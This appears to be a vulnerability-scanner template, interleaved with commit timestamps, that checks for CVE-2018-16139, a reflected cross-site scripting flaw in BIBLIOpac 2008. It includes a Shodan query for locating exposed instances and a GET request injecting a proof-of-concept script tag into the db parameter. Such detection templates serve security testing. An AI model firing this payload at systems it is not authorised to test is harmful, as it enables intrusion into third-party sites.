2022-09-16 19:50:10 +00:00
id : CVE-2018-16139
info :
name : BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting
author : atomiczsec
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : |
BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
reference :
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-16139
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2018-16139
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-09-16 19:50:10 +00:00
metadata :
shodan-query : title:"Bibliopac"
2022-09-16 20:03:07 +00:00
verified : "true"
2022-09-16 19:50:10 +00:00
tags : cve,cve2018,xss,bibliopac,bibliosoft
requests :
- method : GET
path :
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"><script>prompt(document.domain)</script>.xrf'
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
# Enhanced by mp on 2022/09/14